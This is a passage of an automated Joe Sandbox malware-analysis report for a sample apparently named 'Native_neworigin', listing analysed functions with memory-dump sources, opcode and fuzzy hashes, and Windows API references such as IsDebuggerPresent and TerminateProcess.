                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2397747273.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2b7d000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 761a3144919261200a089d49e7a7521834282fd0734b1f7545de0713df02a234
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 86c0c33272f29395b12b6c31f5ed041773f5f76cc64a0479b2c6f33d7470ba58
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 761a3144919261200a089d49e7a7521834282fd0734b1f7545de0713df02a234
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5012B70504305DEE7208A25CD84B67FF9CEF423A4F18C4A9ED590B246C3799801CAB5
                                                                                                                                                                                                                                                                                                                                  Function 05A25BE8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32cb9f75ff266517240a01b35606c9d5ecdee34db84feca50813ccea071238c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e1cfd55dca21d0fe765b7e1ea4e897f168c4bd11bb087aa042b160fa68d7b430
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32cb9f75ff266517240a01b35606c9d5ecdee34db84feca50813ccea071238c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E011734A00158CFEB18DB78D25AB6C3BB2FB89615F250058E51B9F2A0DF399D42CB01
                                                                                                                                                                                                                                                                                                                                  Function 05A26BDA Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 045d5a8ba70a0543865abe79c7860a86de28b9b35ddf7ca1bcccd122e8ac882b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1996e51f7f22e9ae8a0fdd0bf8977f0fb3f6b230c6a9b3b82923cdeb7ea6d8df
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 045d5a8ba70a0543865abe79c7860a86de28b9b35ddf7ca1bcccd122e8ac882b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35017130A50109DFCB45FFB8FA58B9D7BBAEF41304F5046B8C0089B254DE71AA099B91
                                                                                                                                                                                                                                                                                                                                  Function 069213A3 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfaba3b033eac0c123abd938897609eadb92878a86ebfdb3fb079cbcac5521be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9173fa27436ab7b408d3a24388bf5690000a02330f099e482d1459a05a3701e0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfaba3b033eac0c123abd938897609eadb92878a86ebfdb3fb079cbcac5521be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F08135B001198FDB00CFA9D840BEEB7F1FF88326F148695E619A7294C634D9118BA0
                                                                                                                                                                                                                                                                                                                                  Function 05A26BE8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e9f572a6784ca94ab3540cc2d1e0a091e60c7e8e0da621970f70130f49fea7c4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 82983511ff6ed321f54927fd6938b41f900704ab10e792e6cefebb72b5bfb624
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9f572a6784ca94ab3540cc2d1e0a091e60c7e8e0da621970f70130f49fea7c4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01623095020CDFCB45FFB4FA58A9D7BBADF81304F5046B8C0099B254DE716B099B91
                                                                                                                                                                                                                                                                                                                                  Function 06921C50 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 19218ce36d60900ade4ce24411222edbf43a9eb0026fb63f1786a8d2814b935c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 38e463e37e7af04798c893b4a0ad5b05235c2c2e75e5ff42ee2d47a842c60c55
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19218ce36d60900ade4ce24411222edbf43a9eb0026fb63f1786a8d2814b935c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0F089367002196F9F059E9C9C409AF7BABEBC8250B444529FA19C3250DF31892197A5
                                                                                                                                                                                                                                                                                                                                  Function 06921460 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 391b3220de214ce1500a40f19c5c9fc07289eeeea043af1ce2edb56ec53a6239
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6202839fd2ba0e8c6189234fdebbcaeb5c07104877a3df343fe2b53c3a58e368
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 391b3220de214ce1500a40f19c5c9fc07289eeeea043af1ce2edb56ec53a6239
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F0E571D202269FCB40DFB998012EABBFCEF05254F118826E50DD3204F6308A10CBD2
                                                                                                                                                                                                                                                                                                                                  Function 06921109 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 19d2121098b6a97795efc350411907af5971119bdd516367402c25059cb97143
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b4d2c64d25628c7b0ba6f8df2fc89eb954894bbf8a82d09f374ae8999308f252
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19d2121098b6a97795efc350411907af5971119bdd516367402c25059cb97143
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4E02631F042364BAB4471BC65A02BD239AE7C4610B200C79CA19CB789ED66CC8203C2
                                                                                                                                                                                                                                                                                                                                  Function 05A22150 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 394a8404ddab3ec2a8dbc5a6ae95e075fb773d25b9508b19ea187268831b056b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fbb36737b93531e6eb5780f5d961c60ac0e9f68b5c26eda2c5172c0767fb51b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 394a8404ddab3ec2a8dbc5a6ae95e075fb773d25b9508b19ea187268831b056b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE08C363400149FC744E7ADE545F2D3BEAEF8C611B544069FA0ECB320EE69DC028791
                                                                                                                                                                                                                                                                                                                                  Function 06921470 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f06d3fb15929d6cac865bc45deb3fa6cd5ce5b04f42ae6aef249f14adc68c23b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0bc9c981218c8d6c5e966c1d055a4dcd720275e3d2f3008e7e01e7c4e072731
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f06d3fb15929d6cac865bc45deb3fa6cd5ce5b04f42ae6aef249f14adc68c23b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6E04871D102269F8B50DEBD9D011AF7BFCEB45154F118876D50DD3204F630CA1087D1
                                                                                                                                                                                                                                                                                                                                  Function 06920880 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a3ba40bd7efdac070fc15049b5a02c6c06c08d85424105328f3379fc297c1291
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d78f0560093562021fec588876feda908c51f517bbb90c3b9c3eb3f52477fcf4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3ba40bd7efdac070fc15049b5a02c6c06c08d85424105328f3379fc297c1291
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE0C235D3432E8BFF206B68E44A36B379CF704214F200415F50AC3B04EB12C480C6D1
                                                                                                                                                                                                                                                                                                                                  Function 05A22160 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f3ff426ebb6c5240cbfe9b30f9d976c1c0329ec624c1d3a71c59de4c58255af
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f0a60847c2605d01f68b0e12ec7d8dd8642de94c6857c8c9a849c366795aa6f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f3ff426ebb6c5240cbfe9b30f9d976c1c0329ec624c1d3a71c59de4c58255af
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16D05E353400105FC704A76DE508E6D3BEAEF8C61179440A9FA0ECB361EE94DC0287A2

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 0084CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 420COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: d$w
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2400632791
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: deb8ffe72919674885fd208dd25e416feb8b5b0a17f63c634a4e16adbfc99cd5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2c525605c3841b1bf7b09e679c895ab26d19a1da57f0877d8f84570936d6b70
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: deb8ffe72919674885fd208dd25e416feb8b5b0a17f63c634a4e16adbfc99cd5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D16530A0F34CAFCAF54B288C19B797A6CFBA1724F4E0156E556C60F3D798DC049A22
                                                                                                                                                                                                                                                                                                                                  Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                                                                                                                  Function 00863F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000,?,00862038,00000003), ref: 00863F5E
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000,?,00862038,00000003), ref: 00863F65
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00863F77
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c83396f08331c2e9394982c8520995c27f9a004bf649c0591ab68ee283a48c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3301bde06216474e6339e5518da4bbb0f374aa2bfc436cafb8027a0636aae899
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c83396f08331c2e9394982c8520995c27f9a004bf649c0591ab68ee283a48c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E04631404908ABCF016F28DD09E593B39FB46341F026414F806EA232DB76EE82CA82
                                                                                                                                                                                                                                                                                                                                  Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                                                                                                                  Function 00821130 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                                  Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02BD18E0), ref: 004170C5
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                                                                                                                                  • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                                                                                                                                  • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
